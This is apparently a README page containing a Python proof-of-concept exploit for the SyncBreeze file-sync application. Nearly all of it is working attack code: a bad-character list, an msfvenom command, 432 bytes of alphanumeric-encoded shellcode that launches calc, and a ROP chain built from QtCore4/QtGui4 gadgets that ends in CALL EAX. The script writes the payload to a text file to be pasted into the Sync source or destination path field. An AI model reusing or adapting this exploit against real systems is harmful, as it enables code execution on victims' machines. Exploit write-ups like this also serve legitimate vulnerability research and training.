README.md
Rendering markdown...
import os
# Execute .py and payload will be generated on file POCPayload.txt
# Open file on notepad and copy ascii output into SyncBreeze DESTINATION or SOURCE PATH on Sync functionality
# badchars
#\x00\x0a\x0d\x2f\x5c\x5d\x5e\x80
#\x81\x82\x83\x84\x85\x86\x87\x88
#\x89\x8A\x8B\x8C\x8D\x8E\x8F\x90
#\x91\x92\x93\x94\x95\x96\x97\x98
#\x99\x9A\x9B\x9C\x9D\x9E\x9F\xA0
#\xA1\xA2\xA3\xA4\xA5\xA6\xA7\xA8
#\xA9\xAA\xAB\xAC\xAD\xAE\xAF\xB0
#\xB1\xB2\xB3\xB4\xB5\xB6\xB7\xB8
#\xB9\xBA\xBB\xBC\xBD\xBE\xBF\xC0
#\xC1\xC2\xC3\xC4\xC5\xC6\xC7\xC8
#\xC9\xCA\xCB\xCC\xCD\xCE\xCF\xD0
#\xD1\xD2\xD3\xD4\xD5\xD6\xD7\xD8
#\xD9\xDA\xDB\xDC\xDD\xDE\xDF\xE0
#\xE1\xE2\xE3\xE4\xE5\xE6\xE7\xE8
#\xE9\xEA\xEB\xEC\xED\xEE\xEF\xF0
#\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8
#\xF9\xFA\xFB\xFC\xFD\xFE\xFF
# Shellcode payload size: 432 bytes
# Only added a few bad chars into msfvenom commands because alphamixed dealed with the rest
# ./msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed BufferRegister=EAX -b '\x89\xe6\xdb\xde\xd9' -v shellcode -f python
shellcode = b""
shellcode += b"\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a"
shellcode += b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51"
shellcode += b"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
shellcode += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x39\x6c\x6b"
shellcode += b"\x58\x4d\x52\x43\x30\x33\x30\x67\x70\x35\x30"
shellcode += b"\x6f\x79\x4b\x55\x70\x31\x39\x50\x75\x34\x4e"
shellcode += b"\x6b\x46\x30\x30\x30\x4e\x6b\x72\x72\x74\x4c"
shellcode += b"\x6c\x4b\x52\x72\x32\x34\x4c\x4b\x70\x72\x77"
shellcode += b"\x58\x44\x4f\x48\x37\x72\x6a\x74\x66\x54\x71"
shellcode += b"\x79\x6f\x4c\x6c\x57\x4c\x53\x51\x63\x4c\x75"
shellcode += b"\x52\x66\x4c\x57\x50\x4f\x31\x78\x4f\x56\x6d"
shellcode += b"\x47\x71\x6a\x67\x4d\x32\x58\x72\x53\x62\x70"
shellcode += b"\x57\x4c\x4b\x73\x62\x64\x50\x6e\x6b\x32\x6a"
shellcode += b"\x45\x6c\x4e\x6b\x50\x4c\x37\x61\x73\x48\x6d"
shellcode += b"\x33\x33\x78\x75\x51\x6b\x61\x63\x61\x6c\x4b"
shellcode += b"\x32\x79\x47\x50\x35\x51\x68\x53\x4e\x6b\x57"
shellcode += b"\x39\x57\x68\x68\x63\x74\x7a\x31\x59\x4e\x6b"
shellcode += b"\x65\x64\x4e\x6b\x63\x31\x69\x46\x54\x71\x79"
shellcode += b"\x6f\x4e\x4c\x4f\x31\x58\x4f\x54\x4d\x63\x31"
shellcode += b"\x7a\x67\x67\x48\x69\x70\x64\x35\x6a\x56\x54"
shellcode += b"\x43\x73\x4d\x6b\x48\x37\x4b\x31\x6d\x61\x34"
shellcode += b"\x54\x35\x58\x64\x73\x68\x6c\x4b\x61\x48\x61"
shellcode += b"\x34\x33\x31\x6a\x73\x30\x66\x6e\x6b\x66\x6c"
shellcode += b"\x32\x6b\x4e\x6b\x33\x68\x65\x4c\x47\x71\x69"
shellcode += b"\x43\x6c\x4b\x47\x74\x6c\x4b\x43\x31\x5a\x70"
shellcode += b"\x4f\x79\x52\x64\x74\x64\x65\x74\x61\x4b\x73"
shellcode += b"\x6b\x30\x61\x56\x39\x50\x5a\x63\x61\x69\x6f"
shellcode += b"\x79\x70\x53\x6f\x53\x6f\x33\x6a\x4c\x4b\x37"
shellcode += b"\x62\x48\x6b\x6c\x4d\x63\x6d\x43\x5a\x33\x31"
shellcode += b"\x6c\x4d\x4b\x35\x68\x32\x67\x70\x47\x70\x63"
shellcode += b"\x30\x76\x30\x31\x78\x46\x51\x4c\x4b\x70\x6f"
shellcode += b"\x4d\x57\x69\x6f\x48\x55\x6d\x6b\x78\x70\x4d"
shellcode += b"\x65\x39\x32\x33\x66\x52\x48\x4e\x46\x5a\x35"
shellcode += b"\x4d\x6d\x6d\x4d\x4b\x4f\x6a\x75\x57\x4c\x77"
shellcode += b"\x76\x43\x4c\x37\x7a\x4f\x70\x79\x6b\x4d\x30"
shellcode += b"\x73\x45\x75\x55\x4f\x4b\x43\x77\x62\x33\x64"
shellcode += b"\x32\x72\x4f\x71\x7a\x63\x30\x52\x73\x6b\x4f"
shellcode += b"\x79\x45\x31\x73\x43\x51\x72\x4c\x61\x73\x33"
shellcode += b"\x30\x41\x41"
buf = "\x41" * (4096-len(shellcode))
# padding for RETN
padding = b"\x43" * 16
# mini rop-chain to place shellcode address into EAX and CALL EAX
# EDX Stores the address of shellcode - 4 and EAX stores 1
# 0x67024662 (RVA : 0x00024662) : # ADD EAX,EDX # RETN ** [QtCore4.dll] ** | ascii {PAGE_EXECUTE_READ}
addeax = b"\x62\x46\x02\x67"
# INC EAX 3 times to match shellcode address
# 0x65022002 (RVA : 0x00022002) : # INC EAX # RETN ** [QtGui4.dll] ** | ascii {PAGE_EXECUTE_READ}
inceax = b"\x02\x20\x02\x65" * 3
# CALL EAX to run shellcode
#65065325 FFD0 CALL EAX
shellcodepivot = b"\x25\x53\x06\x65"
fruit = shellcode + buf + addeax + padding + inceax + shellcodepivot
# FILE with payload
POCPayload = open("POCPayload.txt", "wb")
POCPayload.write(fruit)
POCPayload.close()